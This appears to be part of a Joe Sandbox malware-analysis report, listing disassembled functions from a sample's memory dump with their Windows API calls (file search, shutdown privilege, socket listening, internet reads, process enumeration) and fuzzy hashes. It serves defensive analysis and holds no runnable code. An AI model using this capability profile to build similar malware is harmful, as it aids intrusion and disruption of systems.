FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00D6F6AB
Sleep.KERNEL32(0000000A), ref: 00D6F6DB
_wcscmp.LIBCMT ref: 00D6F6EF
_wcscmp.LIBCMT ref: 00D6F70A
FindNextFileW.KERNEL32(?,?), ref: 00D6F7A8
FindClose.KERNEL32(00000000), ref: 00D6F7BE

Strings

*.*, xrefs: 00D6F690

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 84e3bee79729f807013153ddbc61c668a1ee8965907a1ca43e5f4c6a51c7293a
Instruction ID: 4d7b8272775a8e6a66e81e7831a0993813399627961dc9bf1c9c829bb4d0d028
Opcode Fuzzy Hash: 84e3bee79729f807013153ddbc61c668a1ee8965907a1ca43e5f4c6a51c7293a
Instruction Fuzzy Hash: D3416F7190161AAFCF15DF64DC85AEEBBB4FF15310F144566E819A72A0DB30AE84CBB0

Function 00D14140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00D14520
VUUU, xrefs: 00D47B0C
ERCP, xrefs: 00D1421F
VUUU, xrefs: 00D144DB
VUUU, xrefs: 00D144ED

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: fb355617e12a95f8942b9dbd29ef147f9c092ed4c76b590e00e60d1c34664a59
Instruction ID: 3e3d83a6427309616a6894af1db2ac6337ae3857f1d619e093dc65c0f4735bfe
Opcode Fuzzy Hash: fb355617e12a95f8942b9dbd29ef147f9c092ed4c76b590e00e60d1c34664a59
Instruction Fuzzy Hash: 09A27D74E0421ADBDF24CF58D9907EDB7B1AF55314F1881AAE859A7280DB309EC1DFA0

Function 00D158C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D15A05
_memmove.LIBCMT ref: 00D15A55
_memmove.LIBCMT ref: 00D15ABB

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 7c6f32ee7f2751639a16f1eb50bc2d36cd597fbddc69165dce6e9c871b85d3e1
Instruction ID: 8621c9c00cb36521d26ed90a71185c9004873100bff0a24aff447b80985bd34f
Opcode Fuzzy Hash: 7c6f32ee7f2751639a16f1eb50bc2d36cd597fbddc69165dce6e9c871b85d3e1
Instruction Fuzzy Hash: E5129E70A00609EBDF14CFA4E981AEEB7F5FF48300F144269E846E7295EB35A955CB70

Function 00D6545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00D58CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D58D0D
Part of subcall function 00D58CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D58D3A
Part of subcall function 00D58CC3: GetLastError.KERNEL32 ref: 00D58D47

ExitWindowsEx.USER32(?,00000000), ref: 00D6549B

Strings

, xrefs: 00D65489
SeShutdownPrivilege, xrefs: 00D6546B
@, xrefs: 00D6548E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 3e94542a6ded40ded6196d16bfef28d21029230f78248150a4124da406eef0b4
Instruction ID: 65e73dce6555900c29497fa2b745370f9e7076477595b9df7e1e67cf48dfa6f2
Opcode Fuzzy Hash: 3e94542a6ded40ded6196d16bfef28d21029230f78248150a4124da406eef0b4
Instruction Fuzzy Hash: EE01F731665B156FE7285778FC4ABBA7258EB04353F2805A1FC47E21D6DE516CC482B0

Function 00D76596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00D765EF
WSAGetLastError.WSOCK32(00000000), ref: 00D765FE
bind.WSOCK32(00000000,?,00000010), ref: 00D7661A
listen.WSOCK32(00000000,00000005), ref: 00D76629
WSAGetLastError.WSOCK32(00000000), ref: 00D76643
closesocket.WSOCK32(00000000,00000000), ref: 00D76657

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 6610b47687cdfed8a9d5f8e9d033316da18dfd693e93e45ebae9c57b33d3c7ef
Instruction ID: 77703a6223ffd8ecff292ea280d58f4d648880aa9a09f43e74508cee5634fa31
Opcode Fuzzy Hash: 6610b47687cdfed8a9d5f8e9d033316da18dfd693e93e45ebae9c57b33d3c7ef
Instruction Fuzzy Hash: 7F218D70600600AFDB10AF64C849B6EB7A9EF44320F148199E95AE73D2EB70ED018B71

Function 00D15680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00D20FF6: std::exception::exception.LIBCMT ref: 00D2102C
Part of subcall function 00D20FF6: __CxxThrowException@8.LIBCMT ref: 00D21041

_memmove.LIBCMT ref: 00D5062F
_memmove.LIBCMT ref: 00D50744
_memmove.LIBCMT ref: 00D507EB

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 8842406d150e0ba12a91e869811b42516a93286776155a25806e745fc4bfb5de
Instruction ID: a2f548d8ad17cc6d8b7a0106f45097cf884819a03adec994752ca2af416bff1f
Opcode Fuzzy Hash: 8842406d150e0ba12a91e869811b42516a93286776155a25806e745fc4bfb5de
Instruction Fuzzy Hash: AC027270E00205EBDF04DF64E981AAEBBB5EF98300F148069EC46DB295EB35D955CBB1

Function 00D01287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00D02612: GetWindowLongW.USER32(?,000000EB), ref: 00D02623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00D019FA
GetSysColor.USER32(0000000F), ref: 00D01A4E
SetBkColor.GDI32(?,00000000), ref: 00D01A61

Part of subcall function 00D01290: DefDlgProcW.USER32(?,00000020,?), ref: 00D012D8

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: bddf15401f08f784b02f6f09c5f089deb1eec99138f3ba5cd3406d61d44ec5ab
Instruction ID: 70c4d492439455f5fffe43d3086496e641d70e5ef6c8cb5d5ad21415a25e03b4
Opcode Fuzzy Hash: bddf15401f08f784b02f6f09c5f089deb1eec99138f3ba5cd3406d61d44ec5ab
Instruction Fuzzy Hash: B0A17978212546BEE639ABA99C48FBF359CDF42351F1C020AF54AD62D2CF20DD0293B5

Function 00D76A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00D780A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00D780CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00D76AB1
WSAGetLastError.WSOCK32(00000000), ref: 00D76ADA
bind.WSOCK32(00000000,?,00000010), ref: 00D76B13
WSAGetLastError.WSOCK32(00000000), ref: 00D76B20
closesocket.WSOCK32(00000000,00000000), ref: 00D76B34

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 0655feb79ae431499d5f40bc73dc87b7ee831db6a9e4ecde214487c8b6077f17
Instruction ID: 6c8a56c3f1e70fb6d0eabbeb6d5029e4e825ce372244fee6bc69a3661849084b
Opcode Fuzzy Hash: 0655feb79ae431499d5f40bc73dc87b7ee831db6a9e4ecde214487c8b6077f17
Instruction Fuzzy Hash: EB418375740610AFEB10AF68DC96F6EB7A9DB44710F448058F95EAB3D3DA709D008BB1

Function 00D855FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00D8564C
IsWindowEnabled.USER32 ref: 00D8565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00D85667
IsIconic.USER32 ref: 00D85675
IsZoomed.USER32 ref: 00D85683

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: ec7763dddf5815e085f4c5cf7bd8f484056e959942a7e67d690815341f7db26b
Instruction ID: f5a53df16bdcf896627b06780c0c5bfe8116f962c06bc3f4447cb27caedfa6fb
Opcode Fuzzy Hash: ec7763dddf5815e085f4c5cf7bd8f484056e959942a7e67d690815341f7db26b
Instruction Fuzzy Hash: A311C131300A116FEB216F26EC46B2FBB99EF84721B844039F84AD7241EB30D9018BB4

Function 00D7C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00D41D88,?), ref: 00D7C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00D7C324

Strings

kernel32.dll, xrefs: 00D7C30D
GetSystemWow64DirectoryW, xrefs: 00D7C31E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 054fe677ece8d5b82932a51a10a75d5cdf7704280cfcf0161ee084304b56721f
Instruction ID: 74489d21f1a7d7edcfe684fe63a79428b4bd8459192d0008deee3e1bcf08ac2d
Opcode Fuzzy Hash: 054fe677ece8d5b82932a51a10a75d5cdf7704280cfcf0161ee084304b56721f
Instruction Fuzzy Hash: 77E0EC75620713CFDB205F25D808B9676D4EB09765B84D43EE89AD2260E770D881CB70

Function 00D13190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 96e4c41b2bb8c19f2ab85e8c6d3d28d170612ac0f527efa58387a3c2ed1b2369
Instruction ID: fd7b54cec7cfb66f50fc0171877570be05d18f518b0209a5fad0e60479278ef2
Opcode Fuzzy Hash: 96e4c41b2bb8c19f2ab85e8c6d3d28d170612ac0f527efa58387a3c2ed1b2369
Instruction Fuzzy Hash: 88228971608301AFD724DF24D891BABB7E5EF84704F14491DF89A97292DB70EA44CBB2

Function 00D7F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00D7F151
Process32FirstW.KERNEL32(00000000,?), ref: 00D7F15F

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

Process32NextW.KERNEL32(00000000,?), ref: 00D7F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00D7F22E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: f8f7fde484f99c15769c77d8364011497e87900159fc217ac5f3229fdd109c30
Instruction ID: 0b91720cb4da772bcf470a2c69b76c4ec24c668e1d5acff9d0e794d971de7c7e
Opcode Fuzzy Hash: f8f7fde484f99c15769c77d8364011497e87900159fc217ac5f3229fdd109c30
Instruction Fuzzy Hash: 69514D71504311AFD320EF24DC85B6BB7E8EF98710F54492DF99997292EB70A904CBB2

Function 00D640B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00D640D1
_memset.LIBCMT ref: 00D640F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00D64144
CloseHandle.KERNEL32(00000000), ref: 00D6414D

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 4c6d5b25789764daffaf12b95f9ba324aefd3147858233044090a44b1a162455
Instruction ID: 02dc52ecef1db436c90bcdfe83063820624174cf669bb8bb884fbfaf608ef2bf
Opcode Fuzzy Hash: 4c6d5b25789764daffaf12b95f9ba324aefd3147858233044090a44b1a162455
Instruction Fuzzy Hash: 5B11A7759013287AD7309BA5AC4DFABBB7CEF45764F1041AAF908D7280D6744E848BB4

Function 00D5EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00D5EB19

Strings

|, xrefs: 00D5EB49
(, xrefs: 00D5EB5F

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 1bff84047dd3646642139d5d2f0c72fd94e4c649d16a41a8b9626e0afe813a6c
Instruction ID: 10c39549d2df281368280fc960d9810d711d0547b317f624dc9972df34d43fef
Opcode Fuzzy Hash: 1bff84047dd3646642139d5d2f0c72fd94e4c649d16a41a8b9626e0afe813a6c
Instruction Fuzzy Hash: 4F323675A007059FDB28DF19C481A6AB7F1FF48320B15C56EE89ADB3A1EB70E941CB50

Function 00D725E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00D726D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00D7270C

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 1889850562cccfd7d309aa598d1310668f706ab700dd72f8a4c39c259069b01a
Instruction ID: 9fd015dca1dade4fd524c00ad391a3f813e000d1e5458bad4a470919676d9518
Opcode Fuzzy Hash: 1889850562cccfd7d309aa598d1310668f706ab700dd72f8a4c39c259069b01a
Instruction Fuzzy Hash: B141C371900289BFEB209A54DD85EBFB7BCEB40728F14806EF649A6240FA719E419670

Function 00D6B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00D6B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00D6B608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00D6B655

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 4b4606eac67919aa54e07c829ea70f57b5609d9115a745b189e84a2cf3fa8469
Instruction ID: 397516e40a10d3f301bd30912358204b58a6b162462644e9a0b5a132857d4a7a
Opcode Fuzzy Hash: 4b4606eac67919aa54e07c829ea70f57b5609d9115a745b189e84a2cf3fa8469
Instruction Fuzzy Hash: 5F216235A10218EFCB00DFA5D884AADFBB8FF49310F1480A9E805EB351DB319955CF61

Function 00D58CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00D20FF6: std::exception::exception.LIBCMT ref: 00D2102C
Part of subcall function 00D20FF6: __CxxThrowException@8.LIBCMT ref: 00D21041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D58D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D58D3A
GetLastError.KERNEL32 ref: 00D58D47

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 9416de52842207179d4bc3839d85e328f50ed7510d2223ad658ba1021d7ee3d0
Instruction ID: 735abf01eb41f67e9a66ffef7ba951e8b2fe8bc55842b14dc541705a69300404
Opcode Fuzzy Hash: 9416de52842207179d4bc3839d85e328f50ed7510d2223ad658ba1021d7ee3d0
Instruction Fuzzy Hash: 4611BFB1414308AFD7289F54EC85D6BB7F8EB14711B20852EF84693241EB30AC408B30

Function 00D64C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D64C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00D64C43
FreeSid.ADVAPI32(?), ref: 00D64C53

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
